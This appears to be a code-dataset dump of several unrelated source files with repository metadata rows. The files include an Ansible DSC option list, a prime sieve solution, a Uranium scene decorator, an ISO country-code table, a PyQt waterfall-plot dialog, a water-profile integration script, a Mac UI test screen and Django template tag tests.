AutoInstallModule:
description:
- If true, the required dsc resource/module will be auto-installed using the Powershell package manager
required: False
default: false
aliases: []
choices:
- true
- false
AutoConfigureLcm:
description:
- If true, LCM will be auto-configured for directly invoking DSC resources (which is a one-time requirement for Ansible DSC modules)
required: False
default: false
aliases: []
choices:
- true
- false
| [
"[email protected]"
] | |
abf55a6e89c418a0d6cb8142f1025f77d7a05d97 | 3879d1ca43c573c209f962182cd1e7f7fe978fbf | /binarysearch/Generate-Primes/Generate-Primes.py | 732a67fc393a9520ae82b86615fcb9d57bfa042b | [] | no_license | DoctorLai/ACM | 34a5600a5adf22660c5d81b2d8b7a358be537ecf | aefa170f74c55c1230eb6f352770512b1e3f469e | refs/heads/master | 2023-09-01T02:13:01.604508 | 2023-08-31T15:42:07 | 2023-08-31T15:42:07 | 146,173,024 | 62 | 18 | null | 2020-10-11T13:19:57 | 2018-08-26T11:00:36 | C++ | UTF-8 | Python | false | false | 538 | py | # https://helloacm.com/teaching-kids-programmaing-generate-prime-numbers-using-sieve-of-eratosthenes-algorithms/
# https://binarysearch.com/problems/Generate-Primes
# EASY, MATH
class Solution:
def solve(self, n):
isPrimes = [False] * 2 + [True] * (n - 1)
i = 2
while i * i <= n:
if isPrimes[i]:
j = i + i
while j <= n:
isPrimes[j] = False
j += i
i += 1
return [x for x in range(1, n + 1) if isPrimes[x]]
| [
"[email protected]"
] | |
7e9bc8c8ada0baa06ab47fa561af1ba9a1656353 | 4e96f383d4703ad8ee58869ed91a0c8432c8a051 | /Cura/Uranium/UM/Scene/GroupDecorator.py | 683f4d0b12d57e068187742b233f7f8283baa708 | [
"GPL-3.0-only",
"LGPL-3.0-only"
] | permissive | flight7788/3d-printing-with-moveo-1 | b2dba26010c4fa31815bc1d2d0966161a8600081 | 7fcb9c6b5da9245d54ac917de8c2a7f5148e42b0 | refs/heads/Feature_Marlin_with_AlanBoy | 2022-08-30T18:36:44.785058 | 2020-05-30T07:52:58 | 2020-05-30T07:52:58 | 212,583,912 | 0 | 0 | MIT | 2020-05-16T07:39:47 | 2019-10-03T13:13:01 | C | UTF-8 | Python | false | false | 1,777 | py | from UM.Scene.SceneNodeDecorator import SceneNodeDecorator
from UM.Scene.Selection import Selection
from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from UM.Scene.SceneNode import SceneNode
class GroupDecorator(SceneNodeDecorator):
def __init__(self, remove_when_empty: bool = True) -> None:
super().__init__()
# Used to keep track of previous parent when an empty group removes itself from the scene.
# We keep this option so that it's possible to undo it.
self._old_parent = None # type: Optional[SceneNode]
self._remove_when_empty = remove_when_empty
def setNode(self, node: "SceneNode") -> None:
super().setNode(node)
if self._node is not None:
self._node.childrenChanged.connect(self._onChildrenChanged)
def isGroup(self) -> bool:
return True
def getOldParent(self) -> Optional["SceneNode"]:
return self._old_parent
def _onChildrenChanged(self, node: "SceneNode") -> None:
if self._node is None:
return
if not self._remove_when_empty:
return
if not self._node.hasChildren():
# A group that no longer has children may remove itself from the scene
self._old_parent = self._node.getParent()
self._node.setParent(None)
Selection.remove(self._node)
else:
# A group that has removed itself from the scene because it had no children may add itself back to the scene
# when a child is added to it.
if not self._node.getParent() and self._old_parent:
self._node.setParent(self._old_parent)
self._old_parent = None
def __deepcopy__(self, memo):
return GroupDecorator() | [
"[email protected]"
] | |
2f9bce858147dcf1996bd5661690506c4d32d259 | d7fe33ef0959cf8d319db5e8c9d08b22ac100f50 | /04_tavli/main/iso.py | 0702a8fc0b4e479c0242e8db766984c6c5095ffb | [
"MIT"
] | permissive | georstef/GoogleAppEngine | 79aaa3a969457ea318c4d5e50258d7b424dff7cc | 008845ec768926513b1e5219267ea12e184cf3be | refs/heads/master | 2020-04-20T21:34:29.654551 | 2014-08-03T11:07:04 | 2014-08-03T11:07:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,179 | py | # coding: utf-8
ISO_3166 = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia',
'BQ': 'Bonaire',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': "Côte d'Ivoire",
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'North Korea',
'KR': 'South Korea',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': "Lao People's Democratic Republic",
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russia',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela',
'VN': 'Vietnam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
| [
"[email protected]"
] | |
adaf1da2130a33488620aa75caf973fd545999c8 | 3365e4d4fc67bbefe4e8c755af289c535437c6f4 | /.history/src/core/dialogs/waterfall_dialog_20170816111635.py | a04802520a5bea5ee054bf9af320a163c394bcc6 | [] | no_license | kiranhegde/OncoPlotter | f3ab9cdf193e87c7be78b16501ad295ac8f7d2f1 | b79ac6aa9c6c2ca8173bc8992ba3230aa3880636 | refs/heads/master | 2021-05-21T16:23:45.087035 | 2017-09-07T01:13:16 | 2017-09-07T01:13:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,845 | py | '''
Refs:
Embedding plot: https://sukhbinder.wordpress.com/2013/12/16/simple-pyqt-and-matplotlib-example-with-zoompan/
'''
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from PyQt5.QtWidgets import (QColorDialog, QHeaderView, QApplication, QDialog, QWidget, QPushButton, QVBoxLayout, QTreeWidget, QTreeWidgetItem, QComboBox)
from PyQt5 import QtCore, QtGui
import core.gui.waterfall as waterfall
import numpy as np
import shelve
from pprint import pprint
class CustomCombo(QComboBox):
def __init__(self,parent,bar_keys_colors,response_type):
super(QComboBox,self).__init__(parent)
#keys is a dictionary: {'key description':color,...}
self.dict_of_keys = bar_keys_colors
self.response_type = response_type
self.populate()
def populate(self):
'''Override method to add items to list'''
for key in list(self.dict_of_keys.keys()):
self.pixmap = QtGui.QPixmap(20,20)
self.pixmap.fill(QtGui.QColor(self.dict_of_keys[key]))
self.color_icon = QtGui.QIcon(self.pixmap)
self.addItem(self.color_icon,key)
self.setCurrentIndex(self.findText(self.response_type,flags=QtCore.Qt.MatchContains)) #default to the patient cancer type
class Waterfall(QWidget, waterfall.Ui_Waterfall):
plot_settings_signal = QtCore.pyqtSignal(list) #send list of plotting params
updated_rectangles_signal = QtCore.pyqtSignal(list) #send list of updated artists for redrawing
def __init__(self, parent):
super(Waterfall,self).__init__(parent)
self.setupUi(self)
self.get_settings()
self.send_settings()
#Button functions
self.btn_apply_general_settings.clicked.connect(self.send_settings)
self.btn_apply_keys_and_colors_settings.clicked.connect(self.send_settings)
self.patient_tree = self.create_patient_tree()
self.data_viewer_container.addWidget(self.patient_tree)
self.btn_color_test.clicked.connect(self.get_color)
def get_color(self):
self.color = QColorDialog.getColor() #returns a color object
print(color)
def get_settings(self):
try:
with shelve.open('WaterfallSettings') as shelfFile:
self.keys_and_colors = shelfFile['keys_and_colors']
shelfFile.close()
except:
#set and use default settings
self.keys_and_colors = {
'CR':'#03945D',
'PR':'#B1EE97',
'PD':'#FF6F69',
'SD':'#707070'}
with shelve.open('WaterfallSettings') as shelfFile:
shelfFile['keys_and_colors'] = self.keys_and_colors
shelfFile.close()
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
def on_generated_rectangles_signal(self,signal):
self.rectangles_received = signal[0]
self.add_items() #display in table
def send_settings(self):
'''
Emit both general plot settings, and color labeling settings. These are the settings to be used when the plot is created.
'''
self.general_settings = [
self.plot_title.text(),
self.x_label.text(),
self.y_label.text(),
[self.twenty_percent_line.isChecked(),
self.thirty_percent_line.isChecked(),
self.zero_percent_line.isChecked()],
[self.display_responses_as_text.isChecked(),
self.display_responses_as_color.isChecked(),
self.display_no_responses.isChecked()],
self.include_table.isChecked()
]
self.plot_settings_signal.emit(self.general_settings)
def create_patient_tree(self):
'''
Create QTreeWidget populated with a patient's data for the DataEntry dialog.
Assumes that self.temp_patient is the patient of interest and that the variable belongs to the dialog.
'''
self.tree = QTreeWidget()
self.root = self.tree.invisibleRootItem()
self.headers = [
'Patient #',
'Best response %',
'Response',
'Cancer',
'Color key',
]
self.headers_item = QTreeWidgetItem(self.headers)
self.tree.setColumnCount(len(self.headers))
self.tree.setHeaderItem(self.headers_item)
self.root.setExpanded(True)
self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents)
self.tree.header().setStretchLastSection(False)
return self.tree
def add_items(self):
'''
Populate viewing tree
'''
self.tree.clear() #clear prior to entering items, prevent aggregation
i=0
for rect in self.rectangles_received:
#populate editable tree with rect data
self.rect_item = QTreeWidgetItem(self.root)
self.rect_params = [
self.waterfall_data['Patient number'][i],
rect.get_height(),
self.waterfall_data['Overall response'][i],
self.waterfall_data['Cancer'][i]
]
for col in range(0,4):
self.rect_item.setText(col,str(self.rect_params[col]))
self.rect_item.setTextAlignment(col,4)
self.tree.setItemWidget(self.rect_item, 4, CustomCombo(self,self.keys_and_colors,self.waterfall_data['Overall response'][i]))
self.rect_item.setFlags(self.rect_item.flags() | QtCore.Qt.ItemIsEditable)
i+=1
def on_updated_tree_item(self):
#update the rectangle which was edited
pass
class WaterfallPlotter(QWidget):
generated_rectangles_signal = QtCore.pyqtSignal(list) #send list of rects for data display in tree
def __init__(self,parent):
super(WaterfallPlotter,self).__init__(parent)
self.get_settings()
self.settings_update = False
self.figure = plt.figure()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas,self)
self.btn_plot = QPushButton('Default Plot')
self.btn_plot.clicked.connect(self.default_plot)
self.layout = QVBoxLayout()
self.layout.addWidget(self.toolbar)
self.layout.addWidget(self.canvas)
self.layout.addWidget(self.btn_plot)
self.setLayout(self.layout)
def on_waterfall_data_signal(self,signal):
self.waterfall_data = signal['waterfall_data'] #pandas dataframe
self.btn_plot.setEnabled(True)
self.btn_apply_general_settings.setEnabled(True)
def get_settings(self):
try:
with shelve.open('WaterfallSettings') as shelfFile:
self.keys_and_colors = shelfFile['keys_and_colors']
shelfFile.close()
except:
#set and use default settings
self.keys_and_colors = {
'CR':'#03945D',
'PR':'#B1EE97',
'PD':'#FF6F69',
'SD':'#707070'}
with shelve.open('WaterfallSettings') as shelfFile:
shelfFile['keys_and_colors'] = self.keys_and_colors
shelfFile.close()
def on_general_settings_signal(self,signal):
self.gen_settings = signal
self.settings_update = True
try:
hasattr(self,'ax')
self.ax.set_title(self.gen_settings[0])
self.ax.set_xlabel(self.gen_settings[1])
self.ax.set_ylabel(self.gen_settings[2])
self.canvas.draw()
except Exception as e:
print(e)
self.default_plot()
def bar_colors(self,responses):
return [self.keys_and_colors[x] for x in responses]
def default_plot(self):
'''
Plot waterfall data
'''
self.figure.clear()
self.rect_locations = np.arange(len(self.waterfall_data['Best response percent change']))
self.ax = self.figure.add_subplot(111)
if self.settings_update == False:
self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent')
self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent')
self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent')
self.ax.grid(color = 'k', axis = 'y', alpha=0.25)
self.bar_colors = self.bar_colors(self.waterfall_data['Overall response'])
self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'], color=self.bar_colors)
else:
#settings were updated, we received them and stored in variable self.gen_settings
if self.gen_settings[3][0]:
self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent')
if self.gen_settings[3][1]:
self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent')
if self.gen_settings[3][2]:
self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent')
if self.gen_settings[4][0]:
#show responses as labels, default color bars
self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'])
self.auto_label_responses(self.ax, self.rects, self.waterfall_data)
elif self.gen_settings[4][1]:
self.bar_colors = self.bar_colors(self.waterfall_data['Overall response'])
self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'], color=self.bar_colors)
else:
self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'])
if self.gen_settings[5]:
self.plot_table()
self.ax.grid(color = 'k', axis = 'y', alpha=0.25)
self.canvas.draw()
self.ax.hold(False) #rewrite the plot when plot() called
self.generated_rectangles_signal.emit([self.rects])
def plot_table(self):
rows = ['%s' % x for x in self.waterfall_data.keys()]
rows = rows[4:] #skip first three, they are the 4 standard headers, rest are table rows
columns = self.waterfall_data['Patient number'] #patient numbers
cell_text = []
for row in rows:
cell_text_temp = []
for col in range(len(columns)):
cell_text_temp.append(self.waterfall_data[row][col])
cell_text.append(cell_text_temp)
the_table = plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, loc='bottom', cellLoc='center')
plt.subplots_adjust(bottom=0.15,left=0.5)
self.ax.set_xlim(-0.5,len(columns)-0.5)
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom='off', # ticks along the bottom edge are off
top='off', # ticks along the top edge are off
labelbottom='off'
) # labels along the bottom edge are off
def update_plot(self):
'''
TODO
'''
pass
def auto_label_responses(self, ax, rects, waterfall_data):
'''Add labels above/below bars'''
i = 0
for rect in rects:
height = rect.get_height()
if height >= 0:
valign = 'bottom'
else:
valign = 'top'
ax.text(rect.get_x() + rect.get_width()/2., height,
'%s' % waterfall_data['Overall response'][i], ha='center', va=valign)
i+=1
| [
"[email protected]"
] | |
85566a279360d8fee75c2ed3b6a5c4fe6426afc1 | 30d360f965253167c99f9b4cd41001491aed08af | /PTFE_code/integrate_profile.py | 4ba0587d6305af16574d6b5b2d36c2e9a6d5dba3 | [] | no_license | petervanya/PhDcode | d2d9f7170f201d6175fec9c3d4094617a5427fb5 | 891e6812a2699025d26b901c95d0c46a706b0c96 | refs/heads/master | 2020-05-22T06:43:47.293134 | 2018-01-29T12:59:42 | 2018-01-29T12:59:42 | 64,495,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,856 | py | #!/usr/bin/env python
"""Usage: integrate_profile.py <profile> <d> [--L <L>]
[AD HOC] Load 1d water profile and integrate
volume of water in polymer and in electrodes.
Arguments:
<file> Water profile, columns [r, f]
<d> Slab width in nm
Options:
--L <L> Box size in DPD units [default: 40]
09/11/16
"""
import numpy as np
from scipy.integrate import simps
import sys
from docopt import docopt
rc = 8.14e-10
if __name__ == "__main__":
args = docopt(__doc__)
L = float(args["--L"])
d_nm = float(args["<d>"])
d = d_nm * 1e-9 / rc
try:
A = np.loadtxt(args["<profile>"])
except FileNotFoundError:
sys.exit("No file found: %s." % args["<profile>"])
r, f = A[:, 0], A[:, 1]
if d < 0.0 or d > L:
sys.exit("Slab width larger than box size.")
print("===== Integrating water profile =====")
print("L: %.2f | slab width: %.2f (%.2f nm)" % (L, d, d_nm))
dr = r[1] - r[0]
re1 = r[r < (L-d)/2]
re2 = r[r > (L+d)/2]
rm = r[(r >= (L-d)/2) & (r <= (L+d)/2)]
fe1 = f[r < (L-d)/2]
fe2 = f[r > (L+d)/2]
fm = f[(r >= (L-d)/2) & (r <= (L+d)/2)]
water_film = simps(fm, dx=dr)
water_elec = simps(fe1, dx=dr) + simps(fe2, dx=dr)
water_tot = simps(f, dx=dr)
print("Total water: %.2f" % water_tot)
print("Electrodes: %.2f | Film: %.2f | mat / el: %.2f" % \
(water_elec, water_film, water_film / water_elec))
R = water_film / (water_film + water_elec)
print("Ratio of water in the film: %.2f" % R)
# water_film = np.sum(fm) * dr
# water_elec = (np.sum(fe1) + np.sum(fe2)) * dr
# water_tot = np.sum(f) * dr
#
# print("Naive quadrature | Total water: %.2f" % water_tot)
# print("Electrodes: %.2f | Matrix: %.2f | mat / el: %.2f" % \
# (water_elec, water_film, water_film / water_elec))
| [
"[email protected]"
] | |
0bea389e510b7977e448170db9a97655fd4abd53 | 7b4e9342d42be2b55af5dc23a8abedd672d68e99 | /MobileApps/libs/flows/mac/smart/screens/printersettings/printer_from_other_devices.py | 96ab7c3b1a277a1e82cb0c00364ddd13f515ba52 | [] | no_license | Amal548/QAMA | af5bb335c92a90b461f1ee9a3870435d83d46802 | b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5 | refs/heads/master | 2023-07-12T09:17:04.624677 | 2021-08-06T08:01:11 | 2021-08-06T08:01:11 | 389,595,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | # encoding: utf-8
'''
Description: It defines the operations of element and verification methods on
the printer from other devices screen.
@author: Sophia
@create_date: Sep 18, 2019
'''
import logging
from MobileApps.libs.flows.mac.smart.screens.smart_screens import SmartScreens
from MobileApps.libs.flows.mac.smart.screens.printersettings.printer_setting_scroll import PrinterSettingScroll
class PrinterFromOtherDevices(PrinterSettingScroll, SmartScreens):
folder_name = "printersettings"
flow_name = "print_from_other_devices"
def __init__(self, driver):
'''
This is initial method for class.
:parameter:
:return:
'''
super(PrinterFromOtherDevices, self).__init__(driver)
# -------------------------------Operate Elements------------------------------
def wait_for_screen_load(self, timeout=30, raise_e=True):
'''
This is a method to wait print from other devices screen load correctly
:parameter:
:return:
'''
logging.debug("[PrinterFromOtherDevices]:[wait_for_screen_load]-Wait for screen loading... ")
return self.driver.wait_for_object("send_link_btn", timeout=timeout, raise_e=raise_e)
def click_send_link_btn(self):
'''
This is a method to click send link button.
:parameter:
:return:
'''
logging.debug("[PrinterFromOtherDevices]:[click_send_link_btn]-Click send link button... ")
self.driver.click("send_link_btn")
# -------------------------------Verification Methods--------------------------
| [
"[email protected]"
] | |
965136bc0b42a3aabe975b1fa258634b2f69fa3e | 395ebd49c4f3a083369406f1cdcb89cfb79fa57f | /tests/core/test_templatetags.py | 76c80869a6d716dc37f8963d8da04fb543a6c65a | [
"MIT"
] | permissive | philgyford/django-spectator | dbf76d93d1ccce9225c4a907c368f6e2cc4462c1 | 2d89dcdb624b01452a5b6ca0ee092774fcc0aa52 | refs/heads/main | 2023-07-24T06:43:13.846287 | 2023-07-11T14:16:34 | 2023-07-11T14:16:34 | 83,340,861 | 45 | 9 | MIT | 2023-07-11T09:48:16 | 2017-02-27T18:04:48 | Python | UTF-8 | Python | false | false | 9,851 | py | from unittest.mock import Mock, patch
from django.http import QueryDict
from django.test import TestCase
from spectator.core.apps import Apps
from spectator.core.factories import IndividualCreatorFactory
from spectator.core.templatetags.spectator_core import (
change_object_link_card,
domain_urlize,
get_enabled_apps,
get_item,
most_read_creators,
most_read_creators_card,
most_visited_venues,
most_visited_venues_card,
query_string,
)
from spectator.events.factories import MiscEventFactory, VenueFactory
from spectator.reading.factories import (
PublicationFactory,
PublicationRoleFactory,
ReadingFactory,
)
from .. import make_date
class GetEnabledAppsTestCase(TestCase):
@patch.object(Apps, "all")
def test_results(self, patched_all):
# all() will return an app that is not installed:
patched_all.return_value = ["events", "reading", "NOPE"]
# So 'NOPE' shouldn't be returned here:
enabled_apps = get_enabled_apps()
self.assertEqual(2, len(enabled_apps))
self.assertEqual(enabled_apps[0], "events")
self.assertEqual(enabled_apps[1], "reading")
class GetItemTestCase(TestCase):
def test_key(self):
dict = {"a": 1}
self.assertEqual(get_item(dict, "a"), 1)
def test_key_none(self):
dict = {"a": 1}
self.assertIsNone(get_item(dict, "b"))
class DomainUrlizeTestCase(TestCase):
def test_domain_urlize(self):
self.assertEqual(
domain_urlize("http://www.example.org/foo/"),
'<a href="http://www.example.org/foo/" rel="nofollow">example.org</a>',
)
class ChangeObjectLinkCardTestCase(TestCase):
def test_output_can_change(self):
creator = IndividualCreatorFactory(pk=5)
perms = ["spectator.can_edit_creator"]
result = change_object_link_card(creator, perms)
self.assertTrue(result["display_link"])
self.assertEqual(
result["change_url"], "/admin/spectator_core/creator/5/change/"
)
class QueryStringTestCase(TestCase):
def test_adds_arg(self):
"It adds your key/value to the existing GET string."
context = {"request": Mock(GET=QueryDict("a=1"))}
self.assertIn(
query_string(context, "foo", "bar"), ["foo=bar&a=1", "a=1&foo=bar"]
)
def test_replaces_arg(self):
"It replaces an existing GET arg with what you supply."
context = {"request": Mock(GET=QueryDict("a=1"))}
self.assertEqual(query_string(context, "a", "bar"), "a=bar")
def test_handles_missing_request(self):
"If there's no request object, it doesn't complain."
context = {}
self.assertEqual(query_string(context, "foo", "bar"), "foo=bar")
def test_urlencodes(self):
"It URL-encodes the returned string."
context = {"request": Mock(GET=QueryDict("a=1"))}
self.assertIn(
query_string(context, "foo", "bar&bar"),
["foo=bar%26bar&a=1", "a=1&foo=bar%26bar"],
)
class MostReadCreatorsTestCase(TestCase):
def test_returns_queryset(self):
"It should return 10 items by default."
d = make_date("2017-02-15")
for i in range(11):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
ReadingFactory(publication=pub, start_date=d, end_date=d, is_finished=True)
creators = most_read_creators()
self.assertEqual(len(creators), 10)
def test_num(self):
"It should return `num` items."
d = make_date("2017-02-15")
for i in range(4):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
ReadingFactory(publication=pub, start_date=d, end_date=d, is_finished=True)
creators = most_read_creators(num=3)
self.assertEqual(len(creators), 3)
def test_finished(self):
"It should only return finished readings"
d = make_date("2017-02-15")
# A finished reading
c1 = IndividualCreatorFactory()
pub1 = PublicationFactory()
PublicationRoleFactory(publication=pub1, creator=c1, role_name="")
ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=True)
ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=True)
ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=False)
# An unfinished reading
c2 = IndividualCreatorFactory()
pub2 = PublicationFactory()
PublicationRoleFactory(publication=pub2, creator=c2, role_name="")
ReadingFactory(publication=pub2, start_date=d, end_date=d, is_finished=False)
creators = most_read_creators()
self.assertEqual(len(creators), 1)
self.assertEqual(creators[0], c1)
self.assertEqual(creators[0].num_readings, 2)
class MostReadCreatorsCardTestCase(TestCase):
def test_returns_correct_data(self):
d = make_date("2017-02-15")
for i in range(2, 13):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
i, publication=pub, start_date=d, end_date=d, is_finished=True
)
data = most_read_creators_card()
self.assertIn("card_title", data)
self.assertIn("score_attr", data)
self.assertIn("object_list", data)
self.assertEqual(data["card_title"], "Most read authors")
self.assertEqual(data["score_attr"], "num_readings")
self.assertEqual(len(data["object_list"]), 10)
def test_num(self):
"It should return `num` items."
d = make_date("2017-02-15")
for i in range(2, 6):
c = IndividualCreatorFactory()
pub = PublicationFactory()
PublicationRoleFactory(publication=pub, creator=c, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
i, publication=pub, start_date=d, end_date=d, is_finished=True
)
data = most_read_creators_card(num=3)
self.assertIn("object_list", data)
self.assertEqual(len(data["object_list"]), 3)
def test_finished(self):
"It should only return finished readings"
d = make_date("2017-02-15")
# A finished reading
c1 = IndividualCreatorFactory()
pub1 = PublicationFactory()
PublicationRoleFactory(publication=pub1, creator=c1, role_name="")
# It'll cut off any with only 1 reading, so:
ReadingFactory.create_batch(
3, publication=pub1, start_date=d, end_date=d, is_finished=True
)
